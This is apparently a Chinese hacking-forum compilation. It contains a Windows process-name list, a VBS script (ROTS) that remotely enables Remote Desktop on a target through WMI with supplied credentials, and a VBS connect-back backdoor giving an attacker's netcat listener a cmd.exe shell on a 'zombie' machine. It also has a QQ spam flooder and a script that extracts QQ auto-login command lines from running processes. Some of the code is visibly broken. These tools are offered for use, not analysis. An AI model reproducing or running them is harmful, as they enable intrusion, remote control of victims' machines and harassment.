scrfs.exe scsiaccess.exe sdii.exe

sdstat.exe se.exe searchnav.exe

searchnavversion.exe sentstrt.exe service5.exe

sessmgr.exe sethook.exe seti@home.exe

setlang.exe sgbhp.exe sgmain.exe

shadowbar.exe sharedprem.exe shell32.exe

shine.exe shpc32.exe shstart.exe

shwicon.exe silent.exe SIMETER.EXE

sistray.exe sisusbrg.exe sixtypopsix.exe

ska.exe skynetave.exe Skype.exe

slee401.exe sllights.exe slpv24s.exe

slserv.exe sm56hlpr.exe smagent.exe

smartagt.exe SmartExplorer.exe SmartFTP.exe

SMax4.exe SMax4PNP.exe SMceMan.exe

smlogsvc.exe smOutlookPack.exe sms.exe

smsmon32.exe smsss.exe smsx.exe

smtray.exe sndrec32.exe sniffer.exe

snmptrap.exe soffice.exe sointgr.exe

SonicStageMonitoring.exe soundtrax.exe spamsub.exe

SpamSubtract.exe SPBBCSvc.exe speedmgr.exe

speedupmypc.exe splash.exe spool.exe

spoolsrv.exe SpoolSvc.exe sptip.dll

spvic.exe spyagent4.exe spyblast.exe

22 其它进程列表

spybotsd.exe spybuddy.exe spysweeper.exe

spyware.exe sqlagent.exe sqlmangr.exe

sqlservr.exe srv32.exe ss.exe

ssgrate.exe sshd.exe ssonsvr.exe

sstray.exe Stacmon.exe StatusClient.exe

supporter5.exe surveyor.exe suss.exe

svaplayer.exe svchoost.exe svchos1.exe

svchosl.exe svcinit.exe svcproc.exe

svhost.exe SwiftBTN.exe swimsuitnetwork.exe

sws.exe sxgdsenu.exe symlcsvc.exe

SymSPort.exe synchost.exe sysagent.exe

syscfg32.exe syscnfg.exe sysformat.exe

syshost.exe syslog.exe sysmon.exe

sysmonnt.exe sysreg.exe SYSsfitb.exe

systask32l.exe systemdll.exe systime.exe

systray32.exe Szchost.exe tapicfg.exe

task32.exe taskbar.exe taskpanl.exe

taskswitch.exe tbctray.exe TBMon.exe

tbpanel.exe tc.exe termsrv.exe

testing.exe tfncky.exe tfnf5.exe

The Weather Channel.exe thotkey.exe timershot.exe

timeup.exe tintsetp.exe tmksrvi.exe

tmksrvu.exe tmpfw.exe toadimon.exe

topdesk.exe toscdspd.exe TouchED.exe

tp4ex.exe tp4mon.exe tp4serv.exe

tphkmgr.exe TPONSCR.exe TpScrex.exe

tpsmain.exe TPTray.exe tpwrtray.exe

tray.exe trayclnt.exe traymon.exe

traymonitor.exe traysaver.exe trayserver.exe

tskdbg.exe tskmgr32.exe tsl2.exe

tsp2.exe tstool.exe tv_media.exe

twunk_64.exe uc.exe udserve.exe

unins000.exe unsecapp.exe upd.exe

upgrade.exe ups.exe usb.exe

usbmmkbd.exe usbmonit.exe usrmlnka.exe

utilman.exe v2iconsole.exe vaserv.exe

vettray.exe vi_grm.exe videodrv.exe

view.exe viewport.exe virtualbouncer.exe

visio.exe vmnat.exe vmss.exe

vobregcheck.exe vsmain.exe vsserv.exe

vssvc.exe VzFw.exe w3dbsmgr.exe

watch.exe watchdog.exe WaveEdit.exe

wbload.exe wbsched.exe wbss.exe

wbutton.exe wcesmgr.exe weather.exe

webcamrt.exe webcolct.exe webinstall.exe

webtrapnt.exe welcome.exe wfxctl32.exe

wfxsnt40.exe wfxswtch.exe whagent.exe

whSurvey.exe win32api.exe WinAce.exe

winadm.exe winadserv.exe winadslave.exe

Winaw32.exe winbackup.exe WinCinemaMgr.exe

wincomm.exe wincomp.exe winctlad.exe

WinCtlAdAlt.exe winde.exe windefault.exe

winex.exe winfs.exe wingate.exe

winhelp.exe winhlp32.exe winhost.exe

wininfo.exe winkey.exe winlog.exe

winmgm32.exe winmysqladmin.exe Winpack.exe

winproj.exe winproxy.exe winpsd.exe

winpup32.exe winrecon.exe winroute.exe

wins.exe winserv.exe winservad.exe

winservices.exe winservs.exe winservsuit.exe

winsocks.exe winsrv32.exe winstat.exe

winsys.exe winsys32.exe wintask.exe

wintasks.exe winvnc.exe winwan.exe

wiseupdt.exe wkdetect.exe wkfud.exe

wkqkpick.exe wkscal.exe wkssb.exe

wlansta.exe wmburn.exe wmencagt.exe

wmexe.exe wmiapsrv.exe WMPBurn.exe

wntsf.exe workflow.exe wp.exe

wptel.exe wsys.exe wuloader.exe

wupdated.exe ww.exe x10nets.exe

x1exec.exe xcommsvr.exe xferwan.exe

xtcfgloader.exe ymsgr_tray.exe ydownloader.exe

YServer.exe yupdater.exe Zanda.exe

zbase32.exe zcast.exe zClientm.exe

ZLH.exe ZStatus.exe

Other Process Categories:

- 系统进程列表

- 存在安全风险进程列表

- 应用程序进程列表

24 回复：VBS 终端脚本

终端脚本

on error resume next

set outstreem=wscript.stdout

set instreem=wscript.stdin

if (lcase(right(wscript.fullname,11))="wscript.exe") then

set objShell=wscript.createObject("wscript.shell")

objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))

wscript.quit

end if

if wscript.arguments.count<3 then

usage()

wscript.echo "Not enough parameters."

wscript.quit

end if

ipaddress=wscript.arguments(0)

username=wscript.arguments(1)

password=wscript.arguments(2)

if wscript.arguments.count>3 then

port=wscript.arguments(3)

else

port=3389

end if

if not isnumeric(port) or port<1 or port>65000 then

wscript.echo "The number of port is error."

wscript.quit

end if

if wscript.arguments.count>4 then

reboot=wscript.arguments(4)

else

reboot=""

end if

usage()

outstreem.write "Conneting "&ipaddress&" ...."

set objlocator=createobject("wbemscripting.swbemlocator")

set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)

showerror(err.number)

objswbemservices.security_.privileges.add 23,true

objswbemservices.security_.privileges.add 18,true

outstreem.write "Checking OS type...."

set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")

for each objinstoscaption in colinstoscaption

if instr(objinstoscaption.caption,"Server")>0 then

wscript.echo "OK!"

else

wscript.echo "OS type is "&objinstoscaption.caption

outstreem.write "Do you want to cancel setup?[y/n]"

strcancel=instreem.readline

if lcase(strcancel)<>"n" then wscript.quit

end if

outstreem.write "Writing into registry ...."

set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")

HKLM=&h80000002

HKU=&h80000003

with objinstreg

.createkey ,"SOFTWARE/Microsoft/Windows/CurrentVersion/netcache"

.setdwordvalue HKLM,"SOFTWARE/Microsoft/Windows/CurrentVersion/netcache","Enabled",0

.createkey HKLM,"SOFTWARE/Policies/Microsoft/Windows/Installer"

.setdwordvalue HKLM,"SOFTWARE/Policies/Microsoft/Windows/Installer","EnableAdminTSRemote",1

.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Control/Terminal Server","TSEnabled",1

.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Services/TermDD","Start",2

.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Services/TermService","Start",2

.setstringvalue HKU,".DEFAULT/Keyboard Layout/Toggle","Hotkey","1"

.setdwordvalue HKLM,"SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp","PortNumber",port

end with

showerror(err.number)

rebt=lcase(reboot)

flag=0

if rebt="/r" or rebt="-r" or rebt="/r" then flag=2

if rebt="/fr" or rebt="-fr" or rebt="/fr" then flag=6

if flag<>0 then

outstreem.write "Now, reboot target...."

strwqlquery="select * from win32_operatingsystem where primary='true'"

set colinstances=objswbemservices.execquery(strwqlquery)

for each objinstance in colinstances

objinstance.win32shutdown(flag)

showerror(err.number)

else

wscript.echo "You need to reboot target."&vbcrlf&"Then,"

end if

wscript.echo "You can logon terminal services on "&port&" later. Good luck!"

function showerror(errornumber)

if errornumber Then

wscript.echo "Error 0x"&cstr(hex(err.number))&" ."

if err.description <> "" then

wscript.echo "Error description: "&err.description&"."

end if

wscript.quit

else

wscript.echo "OK!"

end if

end function

function usage()

wscript.echo string(79,"*")

wscript.echo "ROTS v1.05"

wscript.echo "Remote Open Terminal services Script, by 草哲"

wscript.echo "Welcome to visite www.5458.net"

wscript.echo "Usage:"

wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"

wscript.echo "port: default number is 3389."

wscript.echo "/r: auto reboot target."

wscript.echo "/fr: auto force reboot target."

wscript.echo string(79,"*")&vbcrlf

end function

25 VBS小后门2

VBS小后门2

我也给一个吧～是connect back的，默认UDP模式，因为一般UDP53都被防火墙放过去了，

保存为kao.vbs，远程nc -l -p 1234 -u，然后在（肉鸡）上运行kao.vbs

[肉鸡]

d:/winnt/system32>kao.vbs 210.28.131.162 1234

本地就可以得到一个shell

c:/>nc -l -p 1234 -u

You have got the shell~"

就可以开始打命令咯~~~~~~

有一个缺点，交互模式下，执行的时候有窗口跳出，enjoy~

=============================分割线=====================================

if wscript.arguments.count<2 then

wscript.quit

end if

dim revdata

set sock=createobject("MSWinsock.Winsock")

set sc=createobject("WScript.Shell")

sock.Protocol=1 'UDP 自己修改成TCP的也可以

sock.connect wscript.arguments(0), wscript.arguments(1)

sock.SendData "You have got the shell~" & chr(10) & chr(13)

sock.SendData ">>"

if sock.BytesReceived>0 then

sock.getdata revdata,vbString

if instr(revdata,"exit")>0 then

exit do

else

on error resume next

cmd=left(revdata,len(revdata)-1)

sock.senddata sc.exec("cmd.exe /c " & cmd).stdout.readall & vbcrlf

& vbcrlf

sock.SendData ">>"

end if

loop

sock.senddata "bye!" & vbcrlf

sock.close

sock=nothings

26 用VBS脚本写的QQ聊天刷屏器- -

源码：

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.AppActivate "Hi"

for i=1 to 50 '改成你想要的次数

WScript.Sleep 500

WshShell.SendKeys "^v"

WshShell.SendKeys i

WshShell.SendKeys "%s"

27 利用VBS脚本让QQ永远在线

set fso = Wscript.createObject("Scripting.FileSystemObject")

Set f = fso.createTextFile("QQ自动登录.bat",true)

f.WriteLine "@echo off" & vbcrlf

for each ps in getobject("winmgmts://./root/cimv2:win32_process").instances_ '列出系统中所有正在运行的程序

if lcase(ps.name)="qq.exe" or lcase(ps.name)="tm.exe" then '检测是否QQ或TM

QQCMD=ps.commandline '提取QQ程序的命行

tmp=Replace(QQCMD,chr(34),space(1))

UIN1=instr(tmp,"QQUIN:")+6

if not len(UIN1)=0 then

QQUIN=mid(tmp,UIN1,instr(UIN1,tmp,space(1))-UIN1) '取QQ号码.

QQ=QQ+1

QQNUM=QQNUM & "QQ号码" & QQ & ":" & vbtab & QQUIN & vbcrlf

f.WriteLine "ECHO QQ号码:" & QQUIN

f.WriteLine "ECHO 命令行:" & QQCMD

f.WriteLine QQCMD & vbcrlf

end if

if not len(QQ)=0 then

MSGBOX "已经成功提取以下QQ号码的自动登录命令行" & vbcrlf & vbcrlf & QQNUM & vbcrlf & "具体请查看当前目录下的<QQ自动登录.bat>文件",0,"QQ自动登录命令提取脚本 BY chenall QQ:XXXXXX"

else

msgbox "提取QQ自动登录命令失败,请查看QQ或TM是否正在运行.",0,"QQ自动登录命令提取脚本 BY chenall QQ:XXXXXX"

f.close

set f = fso.getfile("QQ自动登录.bat")

f.delete

end if

28 回复 2 (责任编辑：admin)